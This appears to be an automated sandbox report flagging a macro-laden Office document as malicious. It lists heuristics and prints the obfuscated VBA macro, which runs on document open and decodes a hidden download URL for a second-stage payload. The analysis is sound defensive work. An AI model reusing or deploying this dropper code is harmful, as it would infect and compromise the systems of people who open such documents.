Verdict: MALICIOUS
Risk Score: 202
Malware Insights
MITRE ATT&CK
- T1059.005 Visual Basic
- T1566.001 Spearphishing Attachment
- T1059 Command and Scripting Interpreter
The sample contains VBA macros, specifically a Document_Open macro that uses CreateObject and CallByName. This indicates an attempt to execute arbitrary code at document open, likely to download and run a secondary payload. The presence of a macro-enable lure further supports this assessment. No specific family could be identified because the script is obfuscated.
Heuristics (7)
- VBA macros detected (medium, 4 related findings) OLE_VBA_MACROS: Document contains VBA macro code
- Document_Open macro (high) OLE_VBA_DOCOPEN: Document_Open macro
- CreateObject call (high) OLE_VBA_CREATEOBJ: CreateObject call
- CallByName call (high) OLE_VBA_CALLBYNAME: CallByName call
- VBA p-code auto-exec with execution tokens (high) OLE_VBA_PCODE_AUTOEXEC_EXEC: Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- Macro/content-enable lure (medium) SE_ENABLE_LURE: Document instructs the user to enable macros or editing, a common technique used by malware droppers to bypass Office macro security settings
- Embedded URL (info) EMBEDDED_URL: One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. Extracted URLs:
  - http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
  - http://schemas.openxmlformats.org/officeDocument/2006/bibliography (in document text, OLE body)
  - http://schemas.openxmlformats.org/officeDocument/2006/customXml (in document text, OLE body)
Extracted artifacts (1)
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 15570 bytes |

SHA-256 of macros.bas: 89098a53af55e458bf01a7445aed6776524a11de35385773e18f17ea39f4aba5

Preview script: first 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Function wnTsK(ByVal QkPGagu As String, ByVal DsyfrqCoLbrYJU As String) As Integer
EXoFZ
AelmUimFub = 6891
bYETwdlDscYAv 4165
HDRplQmUzeb 7578, "LDe6L3M8mi3Wnoumg687Vmr2"
If ymRVulRyqt Then
isSlmidTyrGx "dWtamZlOPb4hwN8P36zK1kW8", True, "59i8SxzSBAKVrbTWFSpw1ufK"
abdsjbW "AlhLjOHPyUUVg14aynfXqwP4TA8z", True
zUwtnekfJOckQv
Else
KQzllfqj 1146
End If
wnTsK = 5291
End Function
Private Sub VOzpTzBXn(ByVal kXWmkMWW As String, ByVal uKhaOvn As Integer)
baBRXxceVv "qfj8ZuNHXvdlMbmjU5bqtE", 5222, True
VONOshmyaqJzo
dpYQMgLtS 7063
End Sub
Private Function QdiEhmxo() As String
If sRrQmYWJ Then
QEIBC
Else
moVhRjmyj 2523
End If
QdiEhmxo = "cUDdIBA4ovRMcNT25q"
End Function
Private Sub Document_Open()
Dim pRQUtFdyRapK As String
zXmHXwGmubk = 5132
ckKjyZOabwxN.cMMuFneXrhJYZy
End Sub
Private Function LKtFCToxuiI(ByVal eXxcvLtMTnLeJ As Integer, ByVal dYFqhO As String) As Boolean
qCVUDVpBYXRGYS 564, 1218, "G397G8wcYANYhLgnAIhF03b65GmJAmc"
nlXvEZYvXBN = 5855
lOgSwvHtInyw 1901, "QEsqb4q8RXJOXrOvoQ0skmAq"
UlSLILPDHjZDgf 7473
vWWyxC 238, "6mLQoGAIV4Iyz47kM74Mifq5ZYPGSW", "lGLx1SX7z6atKGawMHK"
LKtFCToxuiI = False
End Function
Attribute VB_Name = "ckKjyZOabwxN"
Private Sub xotLIotwzVF()
Dim uPxRSZTEGQ As Integer
TKAvmItwrh = 7110
kyfpPWBQFjrut xpJgn.RszfFNCaglBDL, 1503, ukOfHaSQI
xpJgn.jiamRfMMAtUxbH xpJgn.RszfFNCaglBDL
End Sub
Public Sub cMMuFneXrhJYZy()
bvoRtxYQQpv = 4891
On Error GoTo wIdGEcfVPdD
DiWkWGYQi.nnxfyc
DiWkWGYQi.zHKPdHCSvt
xotLIotwzVF
Exit Sub
wIdGEcfVPdD:
End Sub
Private Sub kyfpPWBQFjrut(ByVal oAyqyVamVb As String, ByVal kGmhy As Integer, ByVal HBwmTicmkjroP As String)
Dim GDBBr As Integer
Set GRKcQRqvLq = kPdsHUKjTYui.MllfVlZYsX("MUirHzxmr87rkhWsj3uuvzXd8pES", HBwmTicmkjroP, "U8rdFuy70Kw6Klsn0hZqOFf")
kPdsHUKjTYui.yNslYcdFsHbWpc GRKcQRqvLq, AHvdTifo.RWgmVCt("CSajSn'UUtU dJpo9w5nlSo5UadS gjbiSn.5a9ry5J f.i9lJpe", "gp.9SJ5Uj")
xpJgn.tHAtqOgP oAyqyVamVb, PcXVRMMDsoNTyq.SSNroUnn(GRKcQRqvLq, AHvdTifo.RWgmVCt("R7 emsp oQ3nsmemB5mod y ", "5 7Dm3.Q"))
End Sub
Public Function WBTzPIB(ByVal RrBfbwRqTGy As String, ByVal vptnVztIocKij As String) As Object
Dim AyVfllIPUP As String
Dim UQDeMEjNRzTOi As String
Set WBTzPIB = gunLTmBRfz(CreateObject(vptnVztIocKij), False, False)
End Function
Private Function gunLTmBRfz(ByVal XBMCNLEPYU As Object, ByVal WftVz As Boolean, ByVal bMWaKHTMH As Boolean) As Object
Set gunLTmBRfz = XBMCNLEPYU
End Function
Private Function ukOfHaSQI() As String
ukOfHaSQI = AHvdTifo.RWgmVCt("Yh9tWtpWb:/M/9Yra9vLYirYa9jLbibt.YMcoYmW/Mc9aWLta9lLo9Lg/bbobffM9i9ceb19W1M.WdYatY", "bY9WML")
End Function
Attribute VB_Name = "AHvdTifo"
Public Function RWgmVCt(ByVal OUMvapJnUK As String, ByVal UGBREEU As String) As String
Dim UmLiXks As Boolean
For TPlidrtAU = lWlZEcqujniXJf To ENyABmg.HOAgwLfF("GYzlQ9QEmXrzYPwBeHx1PuzqJ5Fl73ky", OUMvapJnUK)
RWgmVCt = ENyABmg.zNfbzhUzud("dsRHvcN8eGHsFWY8AcM0rYvRSBTwWdNTA", RWgmVCt, 8054, OQdtY(UGBREEU, ENyABmg.qNYAgp(TPlidrtAU, "14dhLdqZKLBKNSPR5PN0", OUMvapJnUK)))
Next
End Function
Private Sub GyWdeJKpAcD(ByVal FFaUsNhB As Boolean)
HyLQtGJ = "bZrCH995SnNAf4dHknXoSsDUM"
QKedzcPo 4633, "SxfqDb5N5BmN6pmBGlRCjBt"
rCJaN "EPMuz672uFkbZdwb30cljsTq", "yM5gfDz0UfQISPztVmQWsii1", "zFHj6los5n1z9Np8JbmW0qfcTmehjljN"
TgyWpBlMe = False
lRmVnzo "SoFYFwnN254rINQooVpf"
aChCU 7882
LvjiCNCdlg = 779
VkjVpIogMkzp
End Sub
Private Sub TfJsX()
If FZizwHuhGEBNXe Then
NCOZbQ
ZsGbV = "hMEPZlixL61qckPUxouHUCXyN"
End If
End Sub
Private Function OQdtY(ByVal FlGjPZGcoE As String, ByVal aGrtLvXDMz As String) As String
Dim JSsopXLGJjoij As Integer
Dim bRxPoCZJoJMRSF As String
If Not ENyABmg.xisckvc(aGrtLvXDMz, "vS1Y7HwjHu3H6vNpiWn3GUhQtBfBSPj", FlGjPZGcoE, 4638) Then
OQdtY = aGrtLvXDMz
End If
End Function
Private Function lWlZEcqujniXJf()
... (truncated)